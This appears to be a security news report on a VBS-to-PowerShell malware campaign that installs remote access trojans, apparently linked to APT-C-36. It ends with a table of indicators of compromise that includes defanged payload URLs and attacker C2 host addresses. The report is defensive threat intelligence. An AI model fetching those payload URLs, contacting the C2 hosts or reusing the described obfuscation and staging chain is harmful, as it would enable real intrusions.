A sophisticated, multi-stage malware campaign employing heavily obfuscated Visual Basic Script (VBS) files has been discovered across at least 16 open directories.
This campaign, which leverages VBS files such as “sostener.vbs” as its initial attack vector, is notable for its use of advanced obfuscation, dynamic script generation, and the seamless orchestration of additional payloads through PowerShell.
The ultimate objective is to install remote access trojans (RATs) like Remcos, LimeRAT, AsyncRAT, and DCRat onto victim systems while employing a resilient infrastructure for command-and-control (C2) operations.
Technical Execution: Three-Stage Infection Chain
Analysis revealed a well-structured, three-stage malware delivery system:
- Stage 1 (Dropper/Loader):
The VBS file, often exceeding two megabytes and comprised primarily of obfuscated junk data, serves as the initial dropper. Upon execution, it dynamically generates a PowerShell script in memory after decoding a base64-encoded payload embedded within its structure. - Stage 2 (Stager/Downloader):
The in-memory PowerShell script reaches out to remote servers to retrieve further components, including a memory injector and the next-stage RAT payloads. Download locations vary: payloads may be concealed within JPEG images hosted on the Internet Archive or stored as plain text on services such as gofile.io, cdn.tagbox.io, and paste.ee. URLs are often disguised using reversed strings and base64 encoding.
- Stage 3 (Injector/RAT Deployment):
The downloaded injector loads the final RAT directly into memory, evading on-disk detection. Remcos, LimeRAT, AsyncRAT, and DCRat have all been observed in this phase, fetching the binaries from repositories like Bitbucket and paste.ee.
Infrastructure and Attribution
According to Censys Report, the malware’s C2 infrastructure relies on domains registered with the “duckdns.org” dynamic DNS service, facilitating rapid IP rotation and resiliency against takedown efforts.
Multiple RATs are configured to communicate with independent and frequently changing C2 servers across a distributed pool of hosts and dynamic ports.
Analysis of Bitbucket repository commit logs linked one threat actor, using the alias “Shadow GRT,” to several payloads. This alias correlates with a broader online presence, suggesting links to Colombian threat group APT-C-36 (Blind Eagle).
The tactics and toolset especially the use of obfuscated VBS droppers and modular downloaders are consistent with campaigns previously attributed to this group. However, firm attribution remains speculative due to the open nature of the infrastructure.
The campaign has established a significant network of related domains, TLS certificate fingerprints, payload hashes, and C2 server endpoints.
The infrastructure is notably versatile, employing VPN and port-forwarding services to further obfuscate true server locations.
Indicators of Compromise (IOCs)
| Type | Value |
|---|---|
| Domains | remc21[.]duckdns[.]org, sosten38999[.]duckdns[.]org, rem25rem[.]duckdns[.]org, trabajonuevos[.]duckdns[.]org, gotemburgoxm[.]duckdns[.]org, dcupdate[.]duckdns[.]org, dgflex[.]duckdns[.]org, purelogs2025[.]duckdns[.]org, romanovas[.]duckdns[.]org |
| TLS FP | 95f61fba6418c812c4c62d0c7ee4c8e5c369fc76e044cab6de3b6ddf787db2ed, 59339b7d2ca67b55eef533e66eede5cda4b6b62e5823786ef881d387dff902a5, 274db7b7ec6f0e233a791b06f00bf82fe570a6869ed7df804e5b3e47006c3763 |
| RAT Hashes | d8119df3e735dba78bc6c528f2737d8acb2e87f442596c810afcb5fa85261ad5, 657e021f0dfdd8c628a428a824da278d14d674aefd248f86a58f5bbe4472f0dc, bc017dce8d74cef666069fa07d66e3f1ea952d0b1a0e50f51a8cc3b920da0966, 7dde62518fe19b2e6c8a17b29339e7c11f655da8adfbfc8d1c6d499c967f0a15 |
| Dropper Hashes | 41781819707c4d4b0173d63da71b0c3b7b2ae8794b08c4cc26dc201e1adb5f0f, b0ae166bcd563139925f2203f90e31efd0b067cf16fcce390a0e149f57d4c94d, ad8ff8bba2c5ebc9781993dd7512f904b4acd65337e134951ed47432ceb554a2, bf7fd17c0c92daa075224804a037b5940872ac4011f161e49bc0c790bbfa7d43, and more… |
| URLs | hxxps://paste[.]ee/d/6aKpKL23/0, hxxps://bitbucket[.]org/ramajudicialcolombia20252026100809283/notificacionesjudiciales2025874733/downloads/31agosto.txt, hxxps://bitbucket[.]org/sostener-marzo-2025/sostener15/raw/0592a174dcc1420909aa22c7f0641602d2ac4a2f/sostener15 |
| Hosts | 186[.]169.80.199:1515, 89[.]117.77.234:2404, 45[.]133.180.26:3010, 213[.]199.55.238:5555, 146[.]70.137.90:3010, and others |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates
